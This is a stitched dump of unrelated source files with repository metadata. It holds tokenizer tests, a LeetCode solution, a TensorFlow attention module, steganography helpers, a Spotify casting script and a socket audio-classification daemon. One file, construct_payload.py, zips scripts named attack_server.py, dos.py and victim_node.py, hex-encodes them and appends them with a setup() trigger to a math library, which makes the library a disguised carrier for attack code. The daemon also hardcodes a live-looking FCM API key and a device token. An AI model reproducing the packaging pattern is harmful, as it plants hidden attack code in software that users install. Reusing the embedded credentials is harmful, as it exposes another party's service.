def test_en_tokenizer_handles_basic_contraction_punct(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 3
@pytest.mark.parametrize(
"text_poss,text", [("Robin's", "Robin"), ("Alexis's", "Alexis")]
)
def test_en_tokenizer_handles_poss_contraction(en_tokenizer, text_poss, text):
tokens = en_tokenizer(text_poss)
assert len(tokens) == 2
assert tokens[0].text == text
assert tokens[1].text == "'s"
@pytest.mark.parametrize("text", ["schools'", "Alexis'"])
def test_en_tokenizer_splits_trailing_apos(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 2
assert tokens[0].text == text.split("'")[0]
assert tokens[1].text == "'"
@pytest.mark.parametrize("text", ["'em", "nothin'", "ol'"])
def test_en_tokenizer_doesnt_split_apos_exc(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 1
assert tokens[0].text == text
@pytest.mark.parametrize("text", ["we'll", "You'll", "there'll"])
def test_en_tokenizer_handles_ll_contraction(en_tokenizer, text):
    # "'ll" splits off as its own token and lemmatizes to "will".
    tokens = en_tokenizer(text)
    assert len(tokens) == 2
    assert tokens[0].text == text.split("'")[0]
    assert tokens[1].text == "'ll"
    assert tokens[1].lemma_ == "will"
@pytest.mark.parametrize(
    "text_lower,text_title", [("can't", "Can't"), ("ain't", "Ain't")]
)
def test_en_tokenizer_handles_capitalization(en_tokenizer, text_lower, text_title):
    # Title-casing the input only affects the first sub-token; the
    # contraction suffix tokenizes identically in both cases.
    tokens_lower = en_tokenizer(text_lower)
    tokens_title = en_tokenizer(text_title)
    assert tokens_title[0].text == tokens_lower[0].text.title()
    assert tokens_lower[0].text == tokens_title[0].text.lower()
    assert tokens_lower[1].text == tokens_title[1].text
@pytest.mark.parametrize("pron", ["I", "You", "He", "She", "It", "We", "They"])
@pytest.mark.parametrize("contraction", ["'ll", "'d"])
def test_en_tokenizer_keeps_title_case(en_tokenizer, pron, contraction):
tokens = en_tokenizer(pron + contraction)
assert tokens[0].text == pron
assert tokens[1].text == contraction
@pytest.mark.parametrize("exc", ["Ill", "ill", "Hell", "hell", "Well", "well"])
def test_en_tokenizer_excludes_ambiguous(en_tokenizer, exc):
tokens = en_tokenizer(exc)
assert len(tokens) == 1
@pytest.mark.parametrize(
"wo_punct,w_punct", [("We've", "`We've"), ("couldn't", "couldn't)")]
)
def test_en_tokenizer_splits_defined_punct(en_tokenizer, wo_punct, w_punct):
tokens = en_tokenizer(wo_punct)
assert len(tokens) == 2
tokens = en_tokenizer(w_punct)
assert len(tokens) == 3
@pytest.mark.parametrize("text", ["e.g.", "p.m.", "Jan.", "Dec.", "Inc."])
def test_en_tokenizer_handles_abbr(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 1
def test_en_tokenizer_handles_exc_in_text(en_tokenizer):
text = "It's mediocre i.e. bad."
tokens = en_tokenizer(text)
assert len(tokens) == 6
assert tokens[3].text == "i.e."
@pytest.mark.parametrize("text", ["1am", "12a.m.", "11p.m.", "4pm"])
def test_en_tokenizer_handles_times(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 2
assert tokens[1].lemma_ in ["a.m.", "p.m."]
@pytest.mark.parametrize(
"text,norms", [("I'm", ["i", "am"]), ("shan't", ["shall", "not"])]
)
def test_en_tokenizer_norm_exceptions(en_tokenizer, text, norms):
tokens = en_tokenizer(text)
assert [token.norm_ for token in tokens] == norms
@pytest.mark.parametrize(
"text,norm", [("radicalised", "radicalized"), ("cuz", "because")]
)
def test_en_lex_attrs_norm_exceptions(en_tokenizer, text, norm):
tokens = en_tokenizer(text)
assert tokens[0].norm_ == norm
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
78e8a604cecf27fe811b0c948ad111c099ce963d | e54e1a63bffbe913f5e5018ace56cfa3eab1a72b | /practice/Leetcode/1253_reconstruct_a_2_row_binary_matrix.py | 2b71d9f4f15e8a18ca410c4daa4699f6e1846cec | [] | no_license | rmodi6/scripts | 5e27a46ce8970cbf601f132a53164c273f1812ea | 7cc47eecac00e6bd0b3ec74d7eed8ec3e0e77a84 | refs/heads/master | 2022-02-14T20:41:28.765751 | 2022-01-20T06:59:40 | 2022-01-20T06:59:40 | 168,207,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 976 | py | # https://leetcode.com/contest/weekly-contest-162/problems/reconstruct-a-2-row-binary-matrix/
import numpy as np
class Solution:
    def reconstructMatrix(self, upper: int, lower: int, colsum: List[int]) -> List[List[int]]:
        """Rebuild a 2-row binary matrix with the given row and column sums.

        upper/lower are the required sums of row 0 and row 1; colsum[i]
        (0, 1 or 2) is the required sum of column i.  Returns [] when no
        matrix exists.  Uses plain lists in O(n) — the numpy dependency
        of the original was unnecessary.
        """
        if upper + lower != sum(colsum):
            return []
        n = len(colsum)
        top = [0] * n
        bottom = [0] * n
        # Columns summing to 2 force a 1 in both rows.
        for i, c in enumerate(colsum):
            if c == 2:
                if upper > 0 and lower > 0:
                    top[i] = 1
                    bottom[i] = 1
                    upper -= 1
                    lower -= 1
                else:
                    return []
        # Columns summing to 1 go to whichever row still has budget,
        # preferring the upper row (same greedy order as before).
        for i, c in enumerate(colsum):
            if c == 1:
                if upper > 0:
                    top[i] = 1
                    upper -= 1
                elif lower > 0:
                    bottom[i] = 1
                    lower -= 1
                else:
                    return []
        return [top, bottom]
| [
"modi.ruchit6@gmail.com"
] | modi.ruchit6@gmail.com |
0212f9e5951c9f222ca5a846a070bf81530f2a1c | 47c175daf97051e1f5c37b161f16abbd5f5a506e | /modules/forward_attention.py | 1572b09366af7b47ef3fe8cd017f1bbae7507555 | [
"BSD-3-Clause"
] | permissive | nii-yamagishilab/self-attention-tacotron | 947d1d2eb8bc25f70331fbc401bf44c93ef92673 | 0ebd96114feab5a499964402a8ab7e402f0083b4 | refs/heads/master | 2021-07-11T06:13:18.202669 | 2020-06-19T03:04:42 | 2020-06-19T03:04:42 | 156,176,608 | 116 | 35 | BSD-3-Clause | 2020-06-19T03:04:43 | 2018-11-05T07:21:46 | Python | UTF-8 | Python | false | false | 6,383 | py | # ==============================================================================
# Copyright (c) 2018, Yamagishi Laboratory, National Institute of Informatics
# Author: Yusuke Yasuda (yasuda@nii.ac.jp)
# All rights reserved.
# ==============================================================================
""" """
import tensorflow as tf
from tensorflow.contrib.seq2seq import BahdanauAttention
from collections import namedtuple
def _location_sensitive_score(W_query, W_fill, W_keys):
    """Additive (Bahdanau-style) attention energy with location features.

    Computes sum_k v_a[k] * tanh(W_keys + W_query + W_fill + b_a)[..., k].
    The axis=[2] reduction implies all three inputs broadcast to
    [batch, time, num_units] and the result is [batch, time] — assumes
    callers pass already-projected tensors; TODO confirm shapes.
    """
    dtype = W_query.dtype
    # Static last dim when known at graph-build time, else a dynamic shape op.
    num_units = W_keys.shape[-1].value or tf.shape(W_keys)[-1]
    v_a = tf.get_variable("attention_variable",
                          shape=[num_units],
                          dtype=dtype,
                          initializer=tf.contrib.layers.xavier_initializer())
    b_a = tf.get_variable("attention_bias",
                          shape=[num_units],
                          dtype=dtype,
                          initializer=tf.zeros_initializer())
    return tf.reduce_sum(v_a * tf.tanh(W_keys + W_query + W_fill + b_a), axis=[2])
def _calculate_context(alignments, values):
    '''
    Weighted sum of the memory values under the attention alignments.
    This is a duplication of tensorflow.contrib.seq2seq.attention_wrapper._compute_attention.
    ToDo: Avoid the redundant computation. This requires abstraction of AttentionWrapper itself.
    :param alignments: [batch_size, 1, memory_time]
    :param values: [batch_size, memory_time, memory_size]
    :return: context vector of shape [batch_size, memory_size]
    '''
    # Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
    expanded_alignments = tf.expand_dims(alignments, 1)
    # Batched matmul: [b, 1, T] x [b, T, D] -> [b, 1, D]
    context = tf.matmul(expanded_alignments, values)  # [batch_size, 1, memory_size]
    context = tf.squeeze(context, [1])  # [batch_size, memory_size]
    return context
class ForwardAttentionState(namedtuple("ForwardAttentionState", ["alignments", "alpha", "u"])):
    """Recurrent state: raw alignments, forward-attention alpha, transition factor u."""
    pass
class ForwardAttention(BahdanauAttention):
    """Location-sensitive Bahdanau attention with a forward-attention update.

    The alpha recursion ((1-u)*alpha + u*alpha_shifted) * alignments enforces
    monotonic left-to-right progression; `u` is either a fixed 0.5 or produced
    by an optional learned transition agent.  TF1 / tf.contrib code.
    """

    def __init__(self,
                 num_units,
                 memory,
                 memory_sequence_length,
                 attention_kernel,
                 attention_filters,
                 use_transition_agent=False,
                 cumulative_weights=True,
                 name="ForwardAttention"):
        """Build projection layers; probability_fn=None keeps the parent default."""
        super(ForwardAttention, self).__init__(
            num_units=num_units,
            memory=memory,
            memory_sequence_length=memory_sequence_length,
            probability_fn=None,
            name=name)
        self._use_transition_agent = use_transition_agent
        self._cumulative_weights = cumulative_weights
        # 1-D conv over previous alignments -> location features.
        self.location_convolution = tf.layers.Conv1D(filters=attention_filters,
                                                     kernel_size=attention_kernel,
                                                     padding="SAME",
                                                     use_bias=True,
                                                     bias_initializer=tf.zeros_initializer(),
                                                     name="location_features_convolution")
        self.location_layer = tf.layers.Dense(units=num_units,
                                              use_bias=False,
                                              dtype=memory.dtype,
                                              name="location_features_layer")
        if use_transition_agent:
            # ToDo: support speed control bias
            # Sigmoid projection producing the per-step transition factor u.
            self.transition_factor_projection = tf.layers.Dense(units=1,
                                                                use_bias=True,
                                                                dtype=memory.dtype,
                                                                activation=tf.nn.sigmoid,
                                                                name="transition_factor_projection")

    def __call__(self, query, state):
        """One attention step: returns (normalized alpha, next ForwardAttentionState)."""
        previous_alignments, prev_alpha, prev_u = state
        with tf.variable_scope(None, "location_sensitive_attention", [query]):
            # processed_query shape [batch_size, query_depth] -> [batch_size, attention_dim]
            processed_query = self.query_layer(query) if self.query_layer else query
            # -> [batch_size, 1, attention_dim]
            expanded_processed_query = tf.expand_dims(processed_query, 1)
            # [batch_size, max_time] -> [batch_size, max_time, 1]
            expanded_alignments = tf.expand_dims(previous_alignments, axis=2)
            # location features [batch_size, max_time, filters]
            f = self.location_convolution(expanded_alignments)
            processed_location_features = self.location_layer(f)
            energy = _location_sensitive_score(expanded_processed_query, processed_location_features, self.keys)
        alignments = self._probability_fn(energy, state)
        # forward attention
        # Shift alpha one step right (pad a zero at position 0).
        prev_alpha_n_minus_1 = tf.pad(prev_alpha[:, :-1], paddings=[[0, 0], [1, 0]])
        # 1e-7 keeps the product strictly positive so normalization is safe.
        alpha = ((1 - prev_u) * prev_alpha + prev_u * prev_alpha_n_minus_1 + 1e-7) * alignments
        alpha_normalized = alpha / tf.reduce_sum(alpha, axis=1, keep_dims=True)
        if self._use_transition_agent:
            context = _calculate_context(alpha_normalized, self.values)
            transition_factor_input = tf.concat([context, processed_query], axis=-1)
            transition_factor = self.transition_factor_projection(transition_factor_input)
        else:
            transition_factor = prev_u
        if self._cumulative_weights:
            next_state = ForwardAttentionState(alignments + previous_alignments, alpha_normalized, transition_factor)
        else:
            next_state = ForwardAttentionState(alignments, alpha_normalized, transition_factor)
        return alpha_normalized, next_state

    @property
    def state_size(self):
        """Per-component state sizes matching ForwardAttentionState."""
        return ForwardAttentionState(self._alignments_size, self._alignments_size, 1)

    def initial_state(self, batch_size, dtype):
        """Zero-step state: alpha concentrated on position 0, u = 0.5."""
        initial_alignments = self.initial_alignments(batch_size, dtype)
        # alpha_0 = 1, alpha_n = 0 where n = 2, 3, ..., N
        initial_alpha = tf.concat([
            tf.ones([batch_size, 1], dtype=dtype),
            tf.zeros_like(initial_alignments, dtype=dtype)[:, 1:]], axis=1)
        # transition factor
        initial_u = 0.5 * tf.ones([batch_size, 1], dtype=dtype)
        return ForwardAttentionState(initial_alignments, initial_alpha, initial_u)
| [
"yusuke.007.yasud@gmail.com"
] | yusuke.007.yasud@gmail.com |
c208f338b0b8e717f7788e70ab415ccb06596ec2 | be6ce691a3667edf152859f16804e06aaa486a03 | /solution1/deprecated.py | f70d197db4f26a45a6e6cf1f3aaa93a6efa255a6 | [] | no_license | mik-laj/airflow-deprecation-sample | d9b7d068013884177fec833e234914c6a1ec8be3 | ae1f93ac6ab85cec4c57dcb62f956fec73d88bbe | refs/heads/master | 2020-04-23T00:13:41.579998 | 2019-07-30T13:17:29 | 2019-07-30T13:17:50 | 170,771,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import warnings
# Backwards-compatibility shim: re-export everything from solution1.new so
# existing `import solution1.deprecated` call sites keep working.
from solution1.new import *

# stacklevel=2 attributes the warning to the importing module, not this shim.
# NOTE(review): the message text probably means "solution1.deprecated", not
# "solution.new" — confirm before release.
warnings.warn("solution1.deprecated has moved to solution1.new. Import of "
              "solution.new will become unsupported in version 2",
              DeprecationWarning, 2)
| [
"kamil.bregula@polidea.com"
] | kamil.bregula@polidea.com |
2a563fa6b7c7f2004a33e6eab407557501b546a2 | dbc67a3fcf38da11350d6155a7da0592314d5f5c | /functions.py | 6b8d37738c8033733339a7d2ef44fb41c380ad0b | [] | no_license | cforsythe/Steganography | b5e97fa1307ff3b4e83cb0ff508e1201e8a5d129 | 9f72e46d5e26b10e08e2202eb0e631ba3abf6230 | refs/heads/master | 2021-05-31T15:01:19.860162 | 2016-04-02T06:14:05 | 2016-04-02T06:14:05 | 113,824,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | py | #Resources
#https://docs.python.org/2/tutorial/inputoutput.html
#https://docs.python.org/2/library/functions.html
#https://docs.python.org/2/library/stdtypes.html
#use ord() to get ascii value
#http://www.greenteapress.com/thinkpython/thinkpython.pdf
from PIL import Image
#This function opens a file and reads it then returns list of the words found in that file
def openFileReadText(file):
    """Read a text file and return its whitespace-separated words as a list.

    Uses a context manager so the handle is closed even when reading
    raises (the original leaked the open handle on error).
    """
    with open(file, 'r') as fileWithText:
        return fileWithText.read().split()
#This function accepts a list of words and converts each word into a string of binary digit and adds a whitespace in binary after each word converted into binary
def makeBinaryListOfWords(wordList):
    """Convert each word to a string of 8-bit ASCII codes.

    Returns a flat list alternating [word_bits, space_bits, ...] where
    space_bits is "00100000" (the 8-bit code for ' ') appended after
    every word.  Uses the stdlib format(..., '08b') instead of the
    hand-rolled per-character converter.
    """
    wordsFromFileInBinary = []
    for word in wordList:
        wordsFromFileInBinary.append(''.join(format(ord(ch), '08b') for ch in word))
        wordsFromFileInBinary.append("00100000")
    return wordsFromFileInBinary
#This function makes a number into its binary representation as a string
def makeNumberBinary(number):
    """Return the 8-bit MSB-first binary string for *number* (intended range 0-255)."""
    bits = []
    remaining = number
    # Greedy place-value subtraction, most significant bit first.
    for place_value in (128, 64, 32, 16, 8, 4, 2, 1):
        if remaining < place_value:
            bits.append("0")
        else:
            bits.append("1")
            remaining -= place_value
    return "".join(bits)
#This function takes a binary string of 8-bits and converts it to it's decimal value
def makeBinaryANumber(binaryString):
    """Decode an 8-bit MSB-first binary string back to its integer value."""
    place_values = (128, 64, 32, 16, 8, 4, 2, 1)
    total = 0
    for position, bit in enumerate(binaryString):
        if bit == "1":
            total += place_values[position]
    return total
#This functions takes a binary string of 18-bits and converts it to it's decimal value
def make18BitsANumber(binaryString):
    """Decode an 18-bit MSB-first binary string back to its integer value."""
    place_values = (131072, 65536, 32768, 16384, 8192, 4096, 2048, 1024,
                    512, 256, 128, 64, 32, 16, 8, 4, 2, 1)
    total = 0
    for position, bit in enumerate(binaryString):
        if bit == "1":
            total += place_values[position]
    return total
#This function takes a number makes its
def makeNumber18BitBinaryString(number):
    """Return the 18-bit MSB-first binary string for *number* (intended range 0-262143)."""
    bits = []
    remaining = number
    # Greedy place-value subtraction, most significant bit first.
    for place_value in (131072, 65536, 32768, 16384, 8192, 4096, 2048, 1024,
                        512, 256, 128, 64, 32, 16, 8, 4, 2, 1):
        if remaining < place_value:
            bits.append("0")
        else:
            bits.append("1")
            remaining -= place_value
    return "".join(bits)
#This function prints a list
def printList(listOfWords):
for ix in range(0, len(listOfWords)):
print listOfWords[ix]
| [
"louispromero@student.hartnell.edu"
] | louispromero@student.hartnell.edu |
ba703162cf0be9cf266b4d9d5e3a39f149d6d0ae | 277abbfee6a3755b34a25135dc32399df497f916 | /construct_payload.py | 3cc577f69bf686f1616123dccdbabff2e7cd7579 | [] | no_license | mahersamawi/cs460FinalProject | a9b34ab458bf11be8238640833e497160dc0b7eb | 1d6fc91064c6651c616b2a5b4d156c469ca494d2 | refs/heads/master | 2021-01-23T08:15:07.172565 | 2017-05-07T21:37:16 | 2017-05-07T21:37:16 | 86,488,622 | 2 | 1 | null | 2017-04-30T19:58:10 | 2017-03-28T17:33:33 | Python | UTF-8 | Python | false | false | 439 | py | import subprocess
# Files bundled into the payload archive.
payload_files = [
    'attack_server.py',
    'dos.py',
    'messenger.py',
    'setup.py',
    'encryption.py',
    'victim_node.py'
]
# Zip the payload scripts, hex-encode the archive, and append it (plus a
# setup() trigger) to ourmathlib.py so importing the library carries the
# payload.
# NOTE(review): shell=True with a joined command string is shell-injection
# prone in general; here the names are hard-coded constants so exposure is
# limited, but subprocess.call([...], shell=False) would be safer.
subprocess.call('zip tmp.zip ' + ' '.join(payload_files), shell=True)
# NOTE(review): the zip is opened in text mode ('r') and hex-encoded via
# str.encode('hex') — both only work on Python 2; confirm the intended
# interpreter before reuse.
with open('tmp.zip', 'r') as f:
    raw = f.read()
subprocess.call('rm -rf tmp.zip', shell=True)
with open('ourmathlib/ourmathlib.py', 'a') as f:
    f.write('\netc = \'' + raw.encode('hex') + '\'\nsetup()\n')
| [
"calvin.pelletier@gmail.com"
] | calvin.pelletier@gmail.com |
283845b8c4a81738b39c332e062e558f4a1fa42f | e03f502312775b01b41ea7c6f5cb3dfbafdb8509 | /aboutus/api/serializers.py | 189187d979c6f742e946a41c169302bc8c45fb14 | [] | no_license | Grechanin/Misteckiy-DjangoRest-React-Redux | e223e89310362b8c21e30c8c669d4e170d232db6 | f05eb50a6aec72432716672294df81c3dc939ddd | refs/heads/master | 2020-04-13T10:58:17.931584 | 2019-02-18T09:21:54 | 2019-02-18T09:21:54 | 163,159,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from aboutus.models import AboutUs
from rest_framework import serializers
class AboutUsSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the public text fields of the AboutUs model."""
    class Meta:
        model = AboutUs
        fields = (
            'tab_title',
            'title',
            'short_description',
            'description',
        )
| [
"grechanin@gmail.com"
] | grechanin@gmail.com |
3dd48b123692cca927d423498c37f208f8e4dbb4 | 37153931545967e20ef0d026024c892442b00af3 | /nokkhum/web/api/videos.py | 9a767f3a102a6b19216353421d2fe3e0f2297a79 | [] | no_license | gnekeng/nokkhum | d47313b95369d85889d1859df90ed03a9c12a555 | 254a1edcafa619feae7d319ba46e808406ca59a7 | refs/heads/master | 2023-06-10T13:30:08.057024 | 2021-06-24T09:14:40 | 2021-06-24T09:14:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | from flask_restx import Namespace, Resource
from flask import request, jsonify
from flask_jwt_extended import jwt_required
from santhings import models
from santhings.models import influx
import json
import datetime
from .sensors import get_sensors_data
# Flask-RESTX namespace mounted at /videos.
api = Namespace("videos", description="videos", base_url="/videos")
@api.route("")
class Device(Resource):
    """REST resource for the /videos collection (placeholder implementation)."""
    def get(self):
        # NOTE(review): this returns a literal JSON *string*, which RESTX will
        # serialize as a quoted string rather than an object — confirm intent.
        return '{"data":"get device"}'
    @jwt_required()
    def post(self):
        # Authenticated POST currently returns an empty JSON object.
        result = {}
        return jsonify(result)
"mypspgood@gmail.com"
] | mypspgood@gmail.com |
a418b63acbacdf11e8ce1f9516014528f1ca8df7 | 7ac10d2874e99844846a36281b7b19183e823983 | /node_app/commands/Spotify/Play.py | 0bf022536fb3cc4f10b94d1fff78eaff5032bb06 | [] | no_license | raspi-chromecast-box/WebServer | b50319080a49a5f3f23ef5daeb0ba6fae033a8ec | e6150bd74b136e3c76fc0696a6f2ef5da288746d | refs/heads/master | 2023-02-09T02:44:13.901951 | 2020-04-14T03:15:57 | 2020-04-14T03:15:57 | 244,017,758 | 0 | 0 | null | 2023-01-23T22:21:59 | 2020-02-29T18:10:34 | Python | UTF-8 | Python | false | false | 4,822 | py | #!/usr/bin/env python3
import http.client as http_client
import time
import os
import sys
import json
import pychromecast
from pychromecast import Chromecast
from pychromecast.controllers.spotify import SpotifyController
import spotify_token as st
import redis
import spotipy
def string_to_bool(input_string):
    """Interpret any value as a boolean: truthy iff it reads yes/true/t/1."""
    truthy_words = ("yes", "true", "t", "1")
    return str(input_string).lower() in truthy_words
def try_to_connect_to_redis():
	"""Build a StrictRedis client for localhost:6379 db 1, or False on error.

	NOTE(review): redis.StrictRedis() does not open a socket until the first
	command is issued, so failures usually surface at the caller, not here —
	confirm callers handle command-time exceptions too.
	"""
	try:
		redis_connection = redis.StrictRedis(
			host="127.0.0.1" ,
			port="6379" ,
			db=1 ,
			#password=ConfigDataBase.self[ 'redis' ][ 'password' ]
		)
		return redis_connection
	except Exception as e:
		return False
def GenerateSpotifyToken( options ):
	"""Start a spotify_token session with options["username"]/["password"].

	Returns {"access_token", "expire_time" (unix seconds), "seconds_left"}
	on success, False on failure.
	"""
	try:
		print( "Generating Spotify Token" )
		# NOTE(review): this prints the credentials dict (password included)
		# to stdout/logs — consider removing.
		print( options )
		data = st.start_session( options[ "username" ] , options[ "password" ] )
		access_token = data[ 0 ]
		# data[1] is the absolute expiry timestamp.
		seconds_left = data[ 1 ] - int( time.time() )
		result = {
			"access_token": access_token ,
			"expire_time": data[ 1 ] ,
			"seconds_left": seconds_left
		}
		return result
	except Exception as e:
		print( "Couldn't Generate Spotify Token" )
		print( e )
		return False
def RefreshSpotifyTokenIfNecessary( redis_connection ):
	"""Return a valid Spotify token dict, refreshing via Redis-cached creds.

	Reads credentials from PERSONAL.SPOTIFY and the cached token from
	STATE.SPOTIFY.TOKEN_INFO; regenerates and re-caches the token when it
	is missing or expires within 300 seconds.  Returns False on failure.
	"""
	try:
		try:
			spotify_personal = redis_connection.get( "PERSONAL.SPOTIFY" )
			spotify_personal = json.loads( spotify_personal )
		except Exception as e:
			print( "No Spotify Personal Info Saved to Redis" )
			print( e )
			return False
		try:
			spotify_token_info = redis_connection.get( "STATE.SPOTIFY.TOKEN_INFO" )
			spotify_token_info = json.loads( spotify_token_info )
		except Exception as e:
			print( "No Spotify Token Info Saved to Redis" )
			spotify_token_info = {}
		# No cached token at all: generate and cache a fresh one.
		if "seconds_left" not in spotify_token_info:
			spotify_token_info = GenerateSpotifyToken( spotify_personal )
			redis_connection.set( "STATE.SPOTIFY.TOKEN_INFO" , json.dumps( spotify_token_info ) )
			return spotify_token_info
		# Recompute remaining lifetime from the stored absolute expiry.
		time_now = int( time.time() )
		spotify_token_info[ "seconds_left" ] = spotify_token_info[ "expire_time" ] - time_now
		if spotify_token_info[ "seconds_left" ] < 300:
			print( "Spotify Token is About to Expire in " + str( spotify_token_info[ "seconds_left" ] ) + " Seconds" )
			spotify_token_info = GenerateSpotifyToken( spotify_personal )
			redis_connection.set( "STATE.SPOTIFY.TOKEN_INFO" , json.dumps( spotify_token_info ) )
			return spotify_token_info
		else:
			print( "Spotify Token is Still Valid for " + str( spotify_token_info[ "seconds_left" ] ) + " Seconds" )
			return spotify_token_info
	except Exception as e:
		print( "Couldn't Regenerate Spotify Token" )
		print( e )
		return False
def play():
	"""Cast a Spotify URI to a Chromecast.

	argv: [1] Chromecast IP, [2] Spotify URI, [3] shuffle flag (string).
	Returns True on success, False on any caught failure; exits the
	process on launch/credential/device errors.
	"""
	try:
		output_chromecast_ip = sys.argv[ 1 ]
		uri_to_play = sys.argv[ 2 ]
		shuffle = sys.argv[ 3 ]
		# Bug fix: the original tested `type( shuffle != bool )`, which is the
		# type of a bool and therefore always truthy; test the value's type.
		if not isinstance( shuffle , bool ):
			shuffle = string_to_bool( shuffle )
		redis_connection = try_to_connect_to_redis()
		spotify_token_info = RefreshSpotifyTokenIfNecessary( redis_connection )
		cast = Chromecast( output_chromecast_ip )
		cast.wait()
		client = spotipy.Spotify( auth=spotify_token_info[ "access_token" ] )
		sp = SpotifyController( spotify_token_info[ "access_token" ] , spotify_token_info[ "seconds_left" ] )
		cast.register_handler( sp )
		sp.launch_app()
		if not sp.is_launched and not sp.credential_error:
			print('Failed to launch spotify controller due to timeout')
			sys.exit(1)
		if not sp.is_launched and sp.credential_error:
			print('Failed to launch spotify controller due to credential error')
			sys.exit(1)
		# Find the Spotify Connect device id matching the launched controller.
		devices_available = client.devices()
		spotify_device_id = None
		for device in devices_available['devices']:
			if device['id'] == sp.device:
				spotify_device_id = device['id']
				break
		if not spotify_device_id:
			print('No device with id "{}" known by Spotify'.format(sp.device))
			print('Known devices: {}'.format(devices_available['devices']))
			sys.exit(1)
		# # Start playback
		if uri_to_play.find('track') > 0:
			client.start_playback( device_id=spotify_device_id , uris=[ uri_to_play ] )
		else:
			# NOTE(review): spotipy's start_playback expects context_uri as a
			# plain string; passing a one-element list may be a latent bug —
			# confirm against the spotipy version in use.
			client.start_playback( device_id=spotify_device_id , context_uri=[ uri_to_play ] )
		time.sleep( 2 )
		client.shuffle( shuffle )
		return True
	except Exception as e:
		print( "Couldn't Load URI and Play Spotify" )
		print( e )
		return False
def try_run_block( options ):
	"""Retry options['function_reference'] up to options['number_of_tries'] times.

	Returns the first result that is not False.  Sleeps
	options['sleep_inbetween_seconds'] between attempts; if every attempt
	fails and options['reboot_on_failure'] is True, force-reboots the host.
	"""
	task_name = options[ 'task_name' ]
	delay = options[ 'sleep_inbetween_seconds' ]
	run = options[ 'function_reference' ]
	attempts_left = options[ 'number_of_tries' ]
	while attempts_left > 0:
		attempts_left -= 1
		result = run()
		if result is not False:
			return result
		print( f"Couldn't Run '{task_name}', Sleeping for {str(delay)} Seconds" )
		time.sleep( delay )
	if options[ 'reboot_on_failure' ] == True:
		os.system( "reboot -f" )
try_run_block({
"task_name": "Spotify Play" ,
"number_of_tries": 5 ,
"sleep_inbetween_seconds": 1 ,
"function_reference": play ,
"reboot_on_failure": True
}) | [
"raspiccbox03@gmail.com"
] | raspiccbox03@gmail.com |
a2222b7c61da1124e7c78d8cba9b669f8bf5bd15 | 64baaa5ecb17f5c67095269ac5ad4a7e346c5e32 | /testDaemon.py | f6486738ba5b18dfa71f8e5ca66bb581400ab89c | [] | no_license | chaewonk/clover | 666b23dfd1ec1b46111a4a0b5c983ddc9cde0780 | 690cb0782e0041f4dfe213b3792aa60eea0bb17c | refs/heads/master | 2020-12-31T00:09:35.322612 | 2017-06-14T12:03:54 | 2017-06-14T12:03:54 | 86,558,482 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,512 | py | # -*- coding:utf-8 -*-
import wave
from select import *
from socket import *
from time import ctime
import pyaudio
from pyfcm import FCMNotification
push_service = FCMNotification(api_key="AAAAkXdjqxM:APA91bHgGK9xOi7tTf0ch6tOoxU30hNevDohrkNcyUhLuiHqNgifO4jDDYUSgrVCS_h5VB9JUV1ffxRFa5x-4pshglFyoO2wFtTfT2yfA5UkDIP5iyFfwN1_Jf4fyhQsVd4Kr7_TUZGM")
registration_id ="e76bV14MH3c:APA91bH8ypElx8UqSMwmy5hENsBMmHgEZcxRR0LwDdvuEPWkYrlOWKZ7se_yBdPgJCBTBcmTciGvwWtdBWWQPEDI_vbm3Cnzn-FeW5B4lwnPGWAbJiPlhw11zAgmt1tNUQFndWWIaf03"
data_message = {
"Nick" : "Mario",
"body" : "great match!",
"Room" : "PortugalVSDenmark"
}
message_title = "title"
message_body = "body"
#User-Define libraries
from S2 import *
HOST = ''
PORT = 8001
ADDR = (HOST, PORT)
BUFSIZE = 1024
BUFSIZE2 = 4096
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 44100
def doOperation(data, addr, sock):
"""
operation table
START : client send audio stream to server and send "END" to notice final chunk(buffer)
NEW_CLASS : client sen audio stream to server for request about new audio class label
"""
if (data == 'START') | (data == 'START\n'):
wave_output_filename = ("%s" % (addr,))
f=open(wave_output_filename+'.wav', 'wb')
print "start..."
data = sock.recv(BUFSIZE2)
total_file_size = int(data.split('\n')[0])
print "totial file size: %s" %(total_file_size,)
data = data.split('\n')[1:]
data = ''.join(data)
f.write(data)
remain_size = total_file_size
while(remain_size>BUFSIZE2):
data = sock.recv(BUFSIZE2)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
data = sock.recv(BUFSIZE2)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
if wave_output_filename != "":
cf = s2(wave_output_filename+".wav")
message_body = cf
push_service.notify_single_device(registration_id=registration_id,
message_body=message_body,
data_message=data_message)
sock.send(cf)
print cf
else:
sock.send('err')
# extract audio label by using deep learning
#sock.send('ACK: ANDROID')
#print 'ACK: ANDROID'
f.close()
#os.remove(wave_output_filename+"*")
#elif (data == "TIZEN") | (data == "TIZEN\n"):
elif 'TIZEN' in data:
wave_output_filename = ("%s" % (addr,))
f=open(wave_output_filename+'.wav', 'wb')
print ("start form tizen...")
#data = sock.recv(BUFSIZE)
total_file_size = sock.recv(50)
total_file_size = int(total_file_size.split('/')[0])
print "totial file size: %s" %(total_file_size,)
remain_size = total_file_size
while(remain_size>BUFSIZE):
data = sock.recv(BUFSIZE)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
data = sock.recv(BUFSIZE)
remain_size = remain_size - len(data)
print len(data)
f.write(data)
# extract audio label by using deep learning
if wave_output_filename != "":
cf = s2(wave_output_filename+".wav")
sock.send(cf)
print cf
else:
sock.send('err')
f.close()
#os.remove(wave_output_filename+"*")
elif (data == "NEW_CLASS") | (data == "NEW_CLASS\n"):
frames = []
print "start..."
while (True):
data = sock.recv(BUFSIZE)
if (data == "END") | (data == "END\n"):
print 'END'
break
else:
